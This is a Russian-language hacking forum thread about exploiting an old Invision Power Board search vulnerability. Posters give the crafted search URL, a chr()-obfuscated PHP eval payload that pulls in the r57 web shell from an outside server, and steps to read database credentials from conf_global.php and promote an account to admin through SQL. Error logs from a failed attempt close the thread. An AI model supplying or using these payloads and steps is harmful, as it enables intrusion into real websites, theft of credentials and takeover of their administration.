Можешь пожалуйста объяснить подробнее. Вот я в строке поиска ввел что надо, нажал интер и что дальше делать? плиз ты же умный ) помоги
Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00 И у тебя в браузере открываеться r57 шелл(если форум бажный)
Теперь ни че не происходит. То есть я заменяю все после search_in, жму интер, окно обновляется и опять открывается поиск. Может шелл не так залил, может хостинг фигня... Можешь мне дать адрес твоего шелла, если он есть у тебя?
О. сколько раз на форуме перетирался этот вопрос! 1) Рабочий шелл eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );// 2) тему надо создавать новую, с легким названием. 3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения" 4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00 5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен
Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом
Я поражаюсь зачем тебе админка, если есть шелл,хотя чему тут удивляться сам таким был но я все таки попробую тебе объяснить один из способов как попасть в нее, если разумеется у тебя есть шелл.Для начала зарегистрируй юзера и запомни его id, далее надо выдернуть записи из файла forum/conf_global.php $INFO['sql_database']='............; $INFO['sql_driver']= '.............'; $INFO['sql_host']='.........'; $INFO['sql_pass']= '............'; $INFO['sql_user']='..............'; Потом в самом низу шелла есть: Выполнение SQL запроса туда вставляешь те данные которые ты вытянул из conf_global.php в сам запрос ставишь UPDATE ibf_members SET mgroup=4 WHERE id=ид твоего юзера, и все ты админ, можешь топать в админку.
даже когда отделяешь ; // сплойт неработает почемута ссылка идет с точкой и выдает ошибку можете дать рабочий код ?
IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code) IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code) IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code) IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code) IPB WARNING [2] (null)(): Failed opening 'http://.rcw-team.ru/download/shell/r57shell.txt' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code) вот что я получаю
